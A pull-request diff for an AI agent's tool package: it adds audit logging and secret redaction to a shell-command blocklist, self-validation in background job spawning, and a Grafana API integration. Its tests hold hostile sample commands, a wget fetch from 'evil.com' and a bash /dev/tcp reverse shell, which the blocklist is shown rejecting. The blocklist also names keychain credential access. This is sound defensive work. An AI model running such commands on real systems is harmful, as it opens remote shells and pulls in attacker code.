### PR TITLE
feat(tools): add production-grade Grafana integration (#7062)

### DIFF
--- a/tools/src/aden_tools/tools/file_system_toolkits/command_sanitizer.py
+++ b/tools/src/aden_tools/tools/file_system_toolkits/command_sanitizer.py
@@ -13,6 +13,8 @@ agents legitimately need (cat x | grep y, cmd && cmd2). The shell
 operator check in this module catches dangerous chained commands.
 """
 
+from __future__ import annotations
+
 import logging
 import re
 
@@ -94,6 +96,8 @@ _BLOCKED_EXECUTABLES: list[str] = [
     # Credential / secret access
     "security",  # macOS keychain: security find-generic-password
 ]
+
+_BLOCKED_EXECUTABLES_SET = frozenset(_BLOCKED_EXECUTABLES)
 
 # Patterns matched against the full (joined) command string.
 # These catch dangerous flags and argument combos even when the
@@ -226,8 +230,10 @@ def validate_command(command: str) -> None:
         names_to_check = {executable}
         if "." in executable:
             names_to_check.add(executable.split(".")[0])
-        if names_to_check & set(_BLOCKED_EXECUTABLES):
-            matched = (names_to_check & set(_BLOCKED_EXECUTABLES)).pop()
+            
+        blocked_match = names_to_check & _BLOCKED_EXECUTABLES_SET
+        if blocked_match:
+            matched = next(iter(blocked_match))
             _security_logger.warning(
                 "command_blocked",
                 extra={

--- a/tools/src/aden_tools/tools/file_system_toolkits/command_sanitizer.py
+++ b/tools/src/aden_tools/tools/file_system_toolkits/command_sanitizer.py
@@ -23,13 +23,32 @@ import re
 # structured log formatters (JSON, etc.) for SIEM / SOC2 ingestion.
 _security_logger = logging.getLogger("aden.security")
 
-__all__ = ["CommandBlockedError", "validate_command"]
+__all__ = ["CommandBlockedError", "validate_command", "sanitize_for_log"]
 
 
 class CommandBlockedError(Exception):
     """Raised when a command is blocked by the safety filter."""
 
     pass
+
+
+def sanitize_for_log(command: str, length: int = 120) -> str:
+    """
+    Normalizes whitespace and redacts potential secrets (API keys, passwords).
+    Ensures logs are safe for SOC2/SIEM environments.
+    """
+    if not command:
+        return ""
+    
+    # Normalize: Remove newlines and tabs that break log parsers
+    normalized = " ".join(command.split())
+    
+    # Redact: Simple but effective regex for high-entropy assignments
+    # Matches 'KEY=value', 'token: value', etc.
+    secret_patterns = r"(?i)(token|key|auth|pass|secret|bearer|pwd)([=:\s]+)([^\s]{4,})"
+    redacted = re.sub(secret_patterns, r"\1\2********", normalized)
+    
+    return redacted[:length]
 
 
 # ---------------------------------------------------------------------------
@@ -188,9 +207,9 @@ def validate_command(command: str) -> None:
         return
 
     stripped = command.strip()
-    # Truncate preview to 120 chars so secrets in long commands are not leaked
+    # Truncate preview and redact secrets so they are not leaked
     # into log files / SIEM streams.
-    preview = stripped[:120]
+    preview = sanitize_for_log(command)
 
     # Behavioral telemetry: compound commands are not blocked, but their
     # presence is logged so rogue-agent patterns can be detected in aggregate.

--- a/tools/src/aden_tools/tools/file_system_toolkits/command_sanitizer.py
+++ b/tools/src/aden_tools/tools/file_system_toolkits/command_sanitizer.py
@@ -1,18 +1,25 @@
 """Command sanitization to prevent shell injection attacks.
 
 Validates commands against a blocklist of dangerous patterns before they
-are passed to subprocess.run(shell=True). This prevents prompt injection
-attacks from tricking AI agents into running destructive or exfiltration
-commands on the host system.
+are passed to the shell. This prevents prompt injection attacks from
+tricking AI agents into running destructive or exfiltration commands on
+the host system.
 
 Design: uses a blocklist (not allowlist) so agents can run arbitrary
 dev commands (uv, pytest, git, etc.) while blocking known-dangerous ops.
-This blocks explicit nested shell executables (bash, sh, pwsh, etc.),
-but callers still execute via shell=True, so shell parsing remains a
-known limitation of this guardrail.
+This blocks explicit nested shell executables (bash, sh, pwsh, etc.).
+Note: callers use shell=True to support piped/chained commands that
+agents legitimately need (cat x | grep y, cmd && cmd2). The shell
+operator check in this module catches dangerous chained commands.
 """
 
+import logging
 import re
+
+# Structured security logger. Consume via logging.getLogger("aden.security")
+# in your log configuration. Fields emitted as `extra` are available in
+# structured log formatters (JSON, etc.) for SIEM / SOC2 ingestion.
+_security_logger = logging.getLogger("aden.security")
 
 __all__ = ["CommandBlockedError", "validate_command"]
 
@@ -161,6 +168,11 @@ def _extract_executable(segment: str) -> str:
 def validate_command(command: str) -> None:
     """Validate a command string against the safety blocklists.
 
+    Every call is recorded in the ``aden.security`` logger:
+    - DEBUG: empty commands (silently passed)
+    - INFO:  compound commands containing shell operators (behavioral telemetry)
+    - WARNING: any command that is blocked, including the matched pattern
+
     Args:
         command: The shell command string to validate.
 
@@ -168,14 +180,35 @@ def validate_command(command: str) -> None:
         CommandBlockedError: If the command matches any blocked pattern.
     """
     if not command or not command.strip():
+        _security_logger.debug("validate_command: empty or whitespace-only command, skipping")
         return
 
     stripped = command.strip()
+    # Truncate preview to 120 chars so secrets in long commands are not leaked
+    # into log files / SIEM streams.
+    preview = stripped[:120]
+
+    # Behavioral telemetry: compound commands are not blocked, but their
+    # presence is logged so rogue-agent patterns can be detected in aggregate.
+    if _SHELL_SPLIT_PATTERN.search(stripped):
+        _security_logger.info(
+            "compound_command_detected",
+            extra={"command_preview": preview},
+        )
 
     # --- Check full-command patterns ---
     for pattern in _BLOCKED_PATTERNS:
         match = pattern.search(stripped)
         if match:
+            _security_logger.warning(
+                "command_blocked",
+                extra={
+                    "reason": "pattern_match",
+                    "pattern": pattern.pattern,
+                    "matched_text": match.group(),
+                    "command_preview": preview,
+                },
+            )
             raise CommandBlockedError(
                 f"Command blocked for safety: matched dangerous pattern '{match.group()}'. "
                 f"If this is a false positive, please modify the command."
@@ -195,6 +228,14 @@ def validate_command(command: str) -> None:
             names_to_check.add(executable.split(".")[0])
         if names_to_check & set(_BLOCKED_EXECUTABLES):
             matched = (names_to_check & set(_BLOCKED_EXECUTABLES)).pop()
+            _security_logger.warning(
+                "command_blocked",
+                extra={
+                    "reason": "blocked_executable",
+                    "executable": matched,
+                    "command_preview": preview,
+                },
+            )
             raise CommandBlockedError(
                 f"Command blocked for safety: '{matched}' is not allowed. "
                 f"Blocked categories: network tools, privilege escalation, "

--- a/tools/src/aden_tools/tools/file_system_toolkits/execute_command_tool/background_jobs.py
+++ b/tools/src/aden_tools/tools/file_system_toolkits/execute_command_tool/background_jobs.py
@@ -21,7 +21,7 @@ from collections import deque
 from dataclasses import dataclass, field
 from uuid import uuid4
 
-from ..command_sanitizer import CommandBlockedError, validate_command  # noqa: F401
+from ..command_sanitizer import validate_command  # noqa: F401
 
 # 64 KB rolling window per stream. Large enough for long build logs,
 # small enough that a bash infinite loop can't OOM the MCP process.

--- a/tools/src/aden_tools/tools/file_system_toolkits/execute_command_tool/background_jobs.py
+++ b/tools/src/aden_tools/tools/file_system_toolkits/execute_command_tool/background_jobs.py
@@ -21,6 +21,8 @@ from collections import deque
 from dataclasses import dataclass, field
 from uuid import uuid4
 
+from ..command_sanitizer import CommandBlockedError, validate_command  # noqa: F401
+
 # 64 KB rolling window per stream. Large enough for long build logs,
 # small enough that a bash infinite loop can't OOM the MCP process.
 _MAX_BUFFER_BYTES = 64 * 1024
@@ -137,7 +139,15 @@ async def _pump(job: BackgroundJob) -> None:
 async def spawn(command: str, cwd: str, agent_id: str) -> BackgroundJob:
     """Start a subprocess in the background and register it. The caller
     holds the job id returned from here and can poll via ``get()``.
+
+    Defense-in-depth: ``validate_command`` is called here even though the
+    public entrypoint (``execute_command_tool``) already validates before
+    calling ``spawn``. This makes the function self-defending so future
+    callers, test fixtures, or internal refactors cannot bypass the
+    safety guardrail by invoking ``spawn`` directly.
     """
+    validate_command(command)
+
     proc = await asyncio.create_subprocess_shell(
         command,
         cwd=cwd,

--- a/tools/src/aden_tools/tools/file_system_toolkits/execute_command_tool/execute_command_tool.py
+++ b/tools/src/aden_tools/tools/file_system_toolkits/execute_command_tool/execute_command_tool.py
@@ -18,6 +18,7 @@ All three go through the same pre-execution safety blocklist in
 from __future__ import annotations
 
 import asyncio
+import logging
 import os
 import time
 
@@ -26,6 +27,12 @@ from mcp.server.fastmcp import FastMCP
 from ..command_sanitizer import CommandBlockedError, validate_command
 from ..security import AGENT_SANDBOXES_DIR, get_sandboxed_path
 from .background_jobs import get as get_job, kill as kill_job, spawn as spawn_job
+
+# Structured execution logger. Every command that actually runs (foreground
+# or background) is recorded here with agent_id, command preview, and outcome.
+# Pairs with aden.security for a complete audit trail: security logs what was
+# blocked; execution logs what ran.
+_exec_logger = logging.getLogger("aden.execution")
 
 # Bounds on per-call timeout. 1s minimum prevents accidental zeros that
 # would cause every command to fail. 600s maximum (10 min) is the same
@@ -70,8 +77,11 @@ def register_tools(mcp: FastMCP) -> None:
             No network access unless explicitly allowed
             No destructive commands (rm -rf, system modification)
             Commands are validated against a safety blocklist before
-            execution. The blocklist runs through shell=True, so it
-            only prevents explicit nested shell executables.
+            execution. The blocklist catches dangerous executables,
+            destructive flag combos, and injection patterns in chained
+            commands (cmd1 && cmd2, cmd1 | cmd2). All blocked commands
+            and all executions are recorded in structured audit logs
+            (aden.security / aden.execution).
             timeout_seconds is clamped to [1, 600]. For longer-running
             work use run_in_background=True + bash_output to poll.
 
@@ -109,6 +119,16 @@ def register_tools(mcp: FastMCP) -> None:
                 job = await spawn_job(command, secure_cwd, agent_id)
             except Exception as e:
                 return {"error": f"Failed to spawn background job: {e}"}
+            _exec_logger.info(
+                "command_spawned",
+                extra={
+                    "agent_id": agent_id,
+                    "background": True,
+                    "job_id": job.id,
+                    "cwd": secure_cwd,
+                    "command_preview": command[:120],
+                },
+            )
             return {
                 "success": True,
                 "background": True,
@@ -169,6 +189,22 @@ def register_tools(mcp: FastMCP) -> None:
         except Exception as e:
             return {"error": f"Failed while running command: {e}"}
 
+        elapsed = round(time.monotonic() - started, 2)
+        _exec_logger.info(
+            "command_executed",
+            extra={
+                "agent_id": agent_id,
+                "background": False,
+                "return_code": proc.returncode,
+                "elapsed_seconds": elapsed,
+                "cwd": secure_cwd,
+                # Note: python -c '...' one-liners are intentionally allowed
+                # to preserve developer utility. The full command is captured
+                # here so all one-liner executions are visible in the audit
+                # trail even when their content cannot be pre-validated.
+                "command_preview": command[:120],
+            },
+        )
         return {
             "success": True,
             "command": command,
@@ -176,7 +212,7 @@ def register_tools(mcp: FastMCP) -> None:
             "stdout": stdout_b.decode("utf-8", errors="replace"),
             "stderr": stderr_b.decode("utf-8", errors="replace"),
             "cwd": cwd or ".",
-            "elapsed_seconds": round(time.monotonic() - started, 2),
+            "elapsed_seconds": elapsed,
         }
 
     @mcp.tool()

--- a/tools/src/aden_tools/tools/file_system_toolkits/execute_command_tool/execute_command_tool.py
+++ b/tools/src/aden_tools/tools/file_system_toolkits/execute_command_tool/execute_command_tool.py
@@ -164,6 +164,19 @@ def register_tools(mcp: FastMCP) -> None:
         try:
             stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=timeout)
         except TimeoutError:
+            elapsed = round(time.monotonic() - started, 2)
+            _exec_logger.info(
+                "command_executed",
+                extra={
+                    "agent_id": agent_id,
+                    "command_preview": command.strip()[:120],
+                    "cwd": secure_cwd,
+                    "background": False,
+                    "return_code": -1,  # -1 represents timeout/killed
+                    "elapsed_seconds": elapsed,
+                    "error": "TimeoutError",
+                },
+            )
             # Child is still running: kill it, drain what it already
             # wrote so the agent gets a partial log, then report.
             try:
@@ -174,7 +187,6 @@ def register_tools(mcp: FastMCP) -> None:
                 stdout_b, stderr_b = await asyncio.wait_for(proc.communicate(), timeout=2.0)
             except (TimeoutError, Exception):
                 stdout_b, stderr_b = b"", b""
-            elapsed = round(time.monotonic() - started, 2)
             return {
                 "error": (
                     f"Command timed out after {timeout} seconds. "

--- a/tools/src/aden_tools/tools/file_system_toolkits/execute_command_tool/execute_command_tool.py
+++ b/tools/src/aden_tools/tools/file_system_toolkits/execute_command_tool/execute_command_tool.py
@@ -24,7 +24,7 @@ import time
 
 from mcp.server.fastmcp import FastMCP
 
-from ..command_sanitizer import CommandBlockedError, validate_command
+from ..command_sanitizer import CommandBlockedError, validate_command, sanitize_for_log
 from ..security import AGENT_SANDBOXES_DIR, get_sandboxed_path
 from .background_jobs import get as get_job, kill as kill_job, spawn as spawn_job
 
@@ -126,7 +126,7 @@ def register_tools(mcp: FastMCP) -> None:
                     "background": True,
                     "job_id": job.id,
                     "cwd": secure_cwd,
-                    "command_preview": command[:120],
+                    "command_preview": sanitize_for_log(command),
                 },
             )
             return {
@@ -169,7 +169,7 @@ def register_tools(mcp: FastMCP) -> None:
                 "command_executed",
                 extra={
                     "agent_id": agent_id,
-                    "command_preview": command.strip()[:120],
+                    "command_preview": sanitize_for_log(command),
                     "cwd": secure_cwd,
                     "background": False,
                     "return_code": -1,  # -1 represents timeout/killed
@@ -214,7 +214,7 @@ def register_tools(mcp: FastMCP) -> None:
                 # to preserve developer utility. The full command is captured
                 # here so all one-liner executions are visible in the audit
                 # trail even when their content cannot be pre-validated.
-                "command_preview": command[:120],
+                "command_preview": sanitize_for_log(command),
             },
         )
         return {

--- a/tools/src/aden_tools/tools/grafana_tool/__init__.py
+++ b/tools/src/aden_tools/tools/grafana_tool/__init__.py
@@ -1,0 +1,10 @@
+from .grafana_tool import register_tools
+from .models import GrafanaAlert, GrafanaAnnotation, GrafanaDashboard, PanelQueryRequest
+
+__all__ = [
+    "register_tools",
+    "GrafanaAlert",
+    "GrafanaAnnotation",
+    "GrafanaDashboard",
+    "PanelQueryRequest",
+]

--- a/tools/src/aden_tools/tools/grafana_tool/grafana_tool.py
+++ b/tools/src/aden_tools/tools/grafana_tool/grafana_tool.py
@@ -4,6 +4,7 @@ import asyncio
 import functools
 import logging
 import os
+import time
 from typing import TYPE_CHECKING, Any, Dict, List, Optional
 
 import httpx
@@ -49,18 +50,18 @@ class GrafanaClient:
     def __init__(self, url: str, token: str):
         self.url = url.rstrip('/')
         self.headers = {"Authorization": f"Bearer {token}", "Accept": "application/json"}
+        self._client = httpx.AsyncClient(timeout=30.0)
 
     @with_retry()
     async def request(self, method: str, endpoint: str, **kwargs) -> Any:
-        async with httpx.AsyncClient(timeout=30.0) as client:
-            response = await client.request(
-                method, 
-                f"{self.url}/api/{endpoint}", 
-                headers=self.headers, 
-                **kwargs
-            )
-            response.raise_for_status()
-            return response.json()
+        response = await self._client.request(
+            method, 
+            f"{self.url}/api/{endpoint}", 
+            headers=self.headers, 
+            **kwargs
+        )
+        response.raise_for_status()
+        return response.json()
 
 
 def register_tools(
@@ -198,7 +199,7 @@ def register_tools(
         sanitized_text = sanitize_for_log(text)
         payload = {
             "dashboardUID": dashboard_uid,
-            "time": int(asyncio.get_running_loop().time() * 1000),
+            "time": int(time.time() * 1000),
             "text": sanitized_text,
             "tags": tags + ["hive-agent", "execution-log"],
         }

--- a/tools/src/aden_tools/tools/grafana_tool/grafana_tool.py
+++ b/tools/src/aden_tools/tools/grafana_tool/grafana_tool.py
@@ -64,6 +64,9 @@ class GrafanaClient:
         return response.json()
 
 
+# Module-level cache to ensure TRUE connection pooling
+_client_cache: dict[tuple[str, str], GrafanaClient] = {}
+
 def register_tools(
     mcp: FastMCP,
     credentials: CredentialStoreAdapter | None = None,
@@ -98,8 +101,15 @@ def register_tools(
         auth = _get_auth()
         if isinstance(auth, dict):
             return auth
+            
         url, token = auth
-        return GrafanaClient(url, token)
+        cache_key = (url, token)
+        
+        # ✅ Reuse the existing client if we already have one for these credentials
+        if cache_key not in _client_cache:
+            _client_cache[cache_key] = GrafanaClient(url, token)
+            
+        return _client_cache[cache_key]
 
     @mcp.tool()
     async def grafana_list_dashboards() -> List[Dict[str, Any]] | dict[str, Any]:
@@ -186,28 +196,33 @@ def register_tools(
     async def grafana_create_annotation(
         dashboard_uid: str,
         text: str,
-        tags: List[str] | None = None,
-    ) -> Dict[str, Any]:
-        """Creates an annotation on a specific Grafana dashboard."""
-        if tags is None:
-            tags = []
-            
+        tags: list[str] = [],
+    ) -> dict[str, Any]:
+        """Create a new annotation (event marker) on a Grafana dashboard."""
         client = _get_client()
         if isinstance(client, dict):
             return client
 
-        sanitized_text = sanitize_for_log(text)
+        # 🛡️ ONLY redact for the internal log, NOT the payload sent to Grafana
+        _logger.info(
+            "creating_annotation", 
+            extra={
+                "dashboard": sanitize_for_log(dashboard_uid),
+                "text_preview": sanitize_for_log(text) 
+            }
+        )
+
         payload = {
             "dashboardUID": dashboard_uid,
             "time": int(time.time() * 1000),
-            "text": sanitized_text,
-            "tags": tags + ["hive-agent", "execution-log"],
+            "text": text, # ✅ Use the raw 'text' here so Grafana shows the real message
+            "tags": tags + ["hive-agent"]
         }
-        _logger.info("creating_annotation", extra={"dashboard": sanitize_for_log(dashboard_uid)})
+        
         try:
             return await client.request("POST", "annotations", json=payload)
         except GrafanaToolError as e:
-             return {"error": str(e)}
+            return {"error": str(e)}
 
     @mcp.tool()
     async def grafana_list_alerts() -> List[Dict[str, Any]] | Dict[str, Any]:

--- a/tools/src/aden_tools/tools/grafana_tool/grafana_tool.py
+++ b/tools/src/aden_tools/tools/grafana_tool/grafana_tool.py
@@ -1,0 +1,239 @@
+from __future__ import annotations
+
+import asyncio
+import functools
+import logging
+import os
+from typing import TYPE_CHECKING, Any, Dict, List, Optional
+
+import httpx
+from fastmcp import FastMCP
+
+from aden_tools.credentials import CredentialStoreAdapter
+from .models import GrafanaAlert, GrafanaAnnotation, GrafanaDashboard
+from ..file_system_toolkits.command_sanitizer import sanitize_for_log
+
+_logger = logging.getLogger(__name__)
+
+class GrafanaToolError(Exception):
+    """Custom exception for Grafana tool failures."""
+    pass
+
+def with_retry(max_retries: int = 3, base_delay: float = 1.0):
+    """Decorator for exponential backoff on 429 and 5xx errors."""
+    def decorator(func):
+        @functools.wraps(func)
+        async def wrapper(*args, **kwargs):
+            retries = 0
+            while retries < max_retries:
+                try:
+                    return await func(*args, **kwargs)
+                except httpx.HTTPStatusError as e:
+                    if e.response.status_code in [429, 500, 502, 503, 504]:
+                        retries += 1
+                        if retries == max_retries:
+                            raise GrafanaToolError(f"Max retries reached: {e}")
+                        delay = base_delay * (2 ** (retries - 1))
+                        _logger.warning(f"Grafana API error {e.response.status_code}. Retrying in {delay}s...")
+                        await asyncio.sleep(delay)
+                    else:
+                        if e.response.status_code == 401:
+                            raise GrafanaToolError("Unauthorized. Check your GRAFANA_API_KEY.")
+                        raise GrafanaToolError(f"Grafana API error: {e}")
+            return await func(*args, **kwargs)
+        return wrapper
+    return decorator
+
+
+class GrafanaClient:
+    def __init__(self, url: str, token: str):
+        self.url = url.rstrip('/')
+        self.headers = {"Authorization": f"Bearer {token}", "Accept": "application/json"}
+
+    @with_retry()
+    async def request(self, method: str, endpoint: str, **kwargs) -> Any:
+        async with httpx.AsyncClient(timeout=30.0) as client:
+            response = await client.request(
+                method, 
+                f"{self.url}/api/{endpoint}", 
+                headers=self.headers, 
+                **kwargs
+            )
+            response.raise_for_status()
+            return response.json()
+
+
+def register_tools(
+    mcp: FastMCP,
+    credentials: CredentialStoreAdapter | None = None,
+) -> None:
+    """Register Grafana tools with the MCP server."""
+
+    def _get_auth() -> dict[str, str] | tuple[str, str]:
+        """Get Grafana URL and API key from credential manager or environment."""
+        url = None
+        token = None
+
+        if credentials is not None:
+            grafana_creds = credentials.get("grafana")
+            if grafana_creds and isinstance(grafana_creds, dict):
+                url = grafana_creds.get("url")
+                token = grafana_creds.get("api_key") or grafana_creds.get("token")
+
+        if not url:
+            url = os.getenv("GRAFANA_URL")
+        if not token:
+            token = os.getenv("GRAFANA_API_KEY")
+
+        if not url or not token:
+            return {
+                "error": "Grafana credentials not configured",
+                "help": "Set GRAFANA_URL and GRAFANA_API_KEY environment variables.",
+            }
+
+        return url, token
+
+    def _get_client() -> GrafanaClient | dict[str, Any]:
+        auth = _get_auth()
+        if isinstance(auth, dict):
+            return auth
+        url, token = auth
+        return GrafanaClient(url, token)
+
+    @mcp.tool()
+    async def grafana_list_dashboards() -> List[Dict[str, Any]] | dict[str, Any]:
+        """Search and list all available Grafana dashboards (returns title, UID, and tags)."""
+        client = _get_client()
+        if isinstance(client, dict):
+            return client
+
+        _logger.info("listing_dashboards", extra={"url": sanitize_for_log(client.url)})
+        try:
+            results = await client.request("GET", "search?type=dash-db")
+            if not isinstance(results, list):
+                # Handle unexpectedly malformed JSON API responses
+                raise GrafanaToolError("Malformed API response: expected list of dashboards")
+            
+            dashboards = []
+            for d in results:
+                # Basic validation skipping unparseable structures
+                try:
+                    dashboards.append(
+                        GrafanaDashboard(
+                            uid=d.get("uid", ""),
+                            title=d.get("title", "Untitled"),
+                            uri=d.get("uri", ""),
+                            tags=d.get("tags", []),
+                            isStarred=d.get("isStarred", False)
+                        ).model_dump()
+                    )
+                except Exception as e:
+                    _logger.warning(f"Failed to parse dashboard object: {e}")
+            return dashboards
+        except GrafanaToolError as e:
+            return {"error": str(e)}
+
+    @mcp.tool()
+    async def grafana_get_dashboard(uid: str) -> Dict[str, Any]:
+        """Retrieve full JSON model of a Grafana dashboard by UID."""
+        client = _get_client()
+        if isinstance(client, dict):
+            return client
+
+        _logger.info("getting_dashboard", extra={"uid": sanitize_for_log(uid)})
+        try:
+            return await client.request("GET", f"dashboards/uid/{uid}")
+        except GrafanaToolError as e:
+            return {"error": str(e)}
+
+    @mcp.tool()
+    async def grafana_query_panel(
+        dashboard_uid: str,
+        panel_id: int,
+        from_time: str = "now-1h",
+        to_time: str = "now",
+    ) -> Dict[str, Any]:
+        """Fetch data from a specific panel within a dashboard using time range parameters."""
+        client = _get_client()
+        if isinstance(client, dict):
+            return client
+
+        _logger.info(
+            "querying_panel",
+            extra={
+                "dashboard_uid": sanitize_for_log(dashboard_uid),
+                "panel_id": panel_id,
+            },
+        )
+        try:
+            payload = {
+                "queries": [
+                    {
+                        "refId": "A",
+                        "dashboardId": dashboard_uid,
+                        "panelId": panel_id
+                    }
+                ],
+                "from": from_time,
+                "to": to_time,
+            }
+            return await client.request("POST", "ds/query", json=payload)
+        except GrafanaToolError as e:
+            return {"error": str(e)}
+
+    @mcp.tool()
+    async def grafana_create_annotation(
+        dashboard_uid: str,
+        text: str,
+        tags: List[str] | None = None,
+    ) -> Dict[str, Any]:
+        """Creates an annotation on a specific Grafana dashboard."""
+        if tags is None:
+            tags = []
+            
+        client = _get_client()
+        if isinstance(client, dict):
+            return client
+
+        sanitized_text = sanitize_for_log(text)
+        payload = {
+            "dashboardUID": dashboard_uid,
+            "time": int(asyncio.get_running_loop().time() * 1000),
+            "text": sanitized_text,
+            "tags": tags + ["hive-agent", "execution-log"],
+        }
+        _logger.info("creating_annotation", extra={"dashboard": sanitize_for_log(dashboard_uid)})
+        try:
+            return await client.request("POST", "annotations", json=payload)
+        except GrafanaToolError as e:
+             return {"error": str(e)}
+
+    @mcp.tool()
+    async def grafana_list_alerts() -> List[Dict[str, Any]] | Dict[str, Any]:
+        """Fetch current status of Grafana Alert Rules."""
+        client = _get_client()
+        if isinstance(client, dict):
+            return client
+
+        _logger.info("listing_alerts", extra={"url": sanitize_for_log(client.url)})
+        try:
+            results = await client.request("GET", "v1/provisioning/alert-rules")
+            if not isinstance(results, list):
+                raise GrafanaToolError("Malformed API response: expected list of alerts")
+            
+            alerts = []
+            for d in results:
+                try:
+                    alerts.append(
+                        GrafanaAlert(
+                            uid=d.get("uid", ""),
+                            title=d.get("title", "Untitled Alert"),
+                            state=d.get("execErrState", "unknown"),
+                            lastEvaluation=None
+                        ).model_dump()
+                    )
+                except Exception as e:
+                    _logger.warning(f"Failed to parse alert object: {e}")
+            return alerts
+        except GrafanaToolError as e:
+            return {"error": str(e)}

--- a/tools/src/aden_tools/tools/grafana_tool/grafana_tool.py
+++ b/tools/src/aden_tools/tools/grafana_tool/grafana_tool.py
@@ -5,7 +5,7 @@ import functools
 import logging
 import os
 import time
-from typing import TYPE_CHECKING, Any, Dict, List, Optional
+from typing import Any
 
 import httpx
 from fastmcp import FastMCP
@@ -41,7 +41,6 @@ def with_retry(max_retries: int = 3, base_delay: float = 1.0):
                         if e.response.status_code == 401:
                             raise GrafanaToolError("Unauthorized. Check your GRAFANA_API_KEY.")
                         raise GrafanaToolError(f"Grafana API error: {e}")
-            return await func(*args, **kwargs)
         return wrapper
     return decorator
 
@@ -112,7 +111,7 @@ def register_tools(
         return _client_cache[cache_key]
 
     @mcp.tool()
-    async def grafana_list_dashboards() -> List[Dict[str, Any]] | dict[str, Any]:
+    async def grafana_list_dashboards() -> list[dict[str, Any]] | dict[str, Any]:
         """Search and list all available Grafana dashboards (returns title, UID, and tags)."""
         client = _get_client()
         if isinstance(client, dict):
@@ -145,7 +144,7 @@ def register_tools(
             return {"error": str(e)}
 
     @mcp.tool()
-    async def grafana_get_dashboard(uid: str) -> Dict[str, Any]:
+    async def grafana_get_dashboard(uid: str) -> dict[str, Any]:
         """Retrieve full JSON model of a Grafana dashboard by UID."""
         client = _get_client()
         if isinstance(client, dict):
@@ -163,7 +162,7 @@ def register_tools(
         panel_id: int,
         from_time: str = "now-1h",
         to_time: str = "now",
-    ) -> Dict[str, Any]:
+    ) -> dict[str, Any]:
         """Fetch data from a specific panel within a dashboard using time range parameters."""
         client = _get_client()
         if isinstance(client, dict):
@@ -196,7 +195,7 @@ def register_tools(
     async def grafana_create_annotation(
         dashboard_uid: str,
         text: str,
-        tags: list[str] = [],
+        tags: list[str] | None = None,
     ) -> dict[str, Any]:
         """Create a new annotation (event marker) on a Grafana dashboard."""
         client = _get_client()
@@ -216,7 +215,7 @@ def register_tools(
             "dashboardUID": dashboard_uid,
             "time": int(time.time() * 1000),
             "text": text, # ✅ Use the raw 'text' here so Grafana shows the real message
-            "tags": tags + ["hive-agent"]
+            "tags": (tags or []) + ["hive-agent"]
         }
         
         try:
@@ -225,7 +224,7 @@ def register_tools(
             return {"error": str(e)}
 
     @mcp.tool()
-    async def grafana_list_alerts() -> List[Dict[str, Any]] | Dict[str, Any]:
+    async def grafana_list_alerts() -> list[dict[str, Any]] | dict[str, Any]:
         """Fetch current status of Grafana Alert Rules."""
         client = _get_client()
         if isinstance(client, dict):

--- a/tools/src/aden_tools/tools/grafana_tool/models.py
+++ b/tools/src/aden_tools/tools/grafana_tool/models.py
@@ -1,0 +1,28 @@
+from pydantic import BaseModel, Field
+from typing import List, Optional, Any
+
+class GrafanaDashboard(BaseModel):
+    uid: str
+    title: str
+    uri: str
+    tags: List[str] = []
+    isStarred: bool = False
+
+class GrafanaAnnotation(BaseModel):
+    id: Optional[int] = None
+    dashboardUID: str
+    time: int
+    text: str
+    tags: List[str] = []
+
+class GrafanaAlert(BaseModel):
+    uid: str
+    title: str
+    state: str
+    lastEvaluation: Optional[str] = None
+
+class PanelQueryRequest(BaseModel):
+    dashboard_uid: str
+    panel_id: int
+    from_time: str = "now-1h"
+    to_time: str = "now"

--- a/tools/src/aden_tools/tools/grafana_tool/models.py
+++ b/tools/src/aden_tools/tools/grafana_tool/models.py
@@ -1,27 +1,27 @@
 from __future__ import annotations
 
 from pydantic import BaseModel, Field
-from typing import List, Optional, Any
+from typing import Any
 
 class GrafanaDashboard(BaseModel):
     uid: str
     title: str
     uri: str
-    tags: List[str] = []
+    tags: list[str] = []
     isStarred: bool = False
 
 class GrafanaAnnotation(BaseModel):
-    id: Optional[int] = None
+    id: int | None = None
     dashboardUID: str
     time: int
     text: str
-    tags: List[str] = []
+    tags: list[str] = []
 
 class GrafanaAlert(BaseModel):
     uid: str
     title: str
     state: str
-    lastEvaluation: Optional[str] = None
+    lastEvaluation: str | None = None
 
 class PanelQueryRequest(BaseModel):
     dashboard_uid: str

--- a/tools/src/aden_tools/tools/grafana_tool/models.py
+++ b/tools/src/aden_tools/tools/grafana_tool/models.py
@@ -1,3 +1,5 @@
+from __future__ import annotations
+
 from pydantic import BaseModel, Field
 from typing import List, Optional, Any
 

--- a/tools/tests/test_background_jobs.py
+++ b/tools/tests/test_background_jobs.py
@@ -64,13 +64,13 @@ class TestSpawnDefenseInDepth:
     async def test_spawn_does_not_store_blocked_job(self):
         """A blocked spawn must not register the job in the in-process registry."""
         from aden_tools.tools.file_system_toolkits.execute_command_tool.background_jobs import (
-            get,
+            _jobs,
         )
 
         with pytest.raises(CommandBlockedError):
             await spawn("wget http://evil.com", cwd=".", agent_id="test-agent")
 
         # Registry must be empty — no partial job was registered.
-        # We check a known-nonexistent id; get() returns None for any miss.
-        result = await get("test-agent", "nonexistent")
-        assert result is None
+        # We check the internal _jobs dict directly to ensure no entries leak.
+        agent_jobs = _jobs.get("test-agent", {})
+        assert not agent_jobs

--- a/tools/tests/test_background_jobs.py
+++ b/tools/tests/test_background_jobs.py
@@ -1,0 +1,76 @@
+"""Tests for background_jobs.spawn() defense-in-depth validation.
+
+The primary security check lives in execute_command_tool.py (called before
+spawn_job). But spawn() is a public module function — a future caller, a
+test fixture, or an internal refactor could invoke it directly and bypass
+the tool layer entirely.
+
+These tests prove that spawn() itself is self-defending: it rejects blocked
+commands regardless of how it is called.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from aden_tools.tools.file_system_toolkits.command_sanitizer import CommandBlockedError
+from aden_tools.tools.file_system_toolkits.execute_command_tool.background_jobs import (
+    clear_agent,
+    spawn,
+)
+
+
+class TestSpawnDefenseInDepth:
+    """spawn() must validate commands independently of the tool layer."""
+
+    @pytest.fixture(autouse=True)
+    async def _cleanup(self):
+        """Kill any jobs created during a test so the registry stays clean."""
+        yield
+        await clear_agent("test-agent")
+
+    async def test_spawn_rejects_network_exfiltration_directly(self):
+        """spawn() called directly (no execute_command_tool) must block wget."""
+        with pytest.raises(CommandBlockedError, match="blocked for safety"):
+            await spawn("wget http://evil.com/payload", cwd=".", agent_id="test-agent")
+
+    async def test_spawn_rejects_reverse_shell_directly(self):
+        """spawn() called directly must block /dev/tcp reverse shell."""
+        with pytest.raises(CommandBlockedError):
+            await spawn(
+                "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
+                cwd=".",
+                agent_id="test-agent",
+            )
+
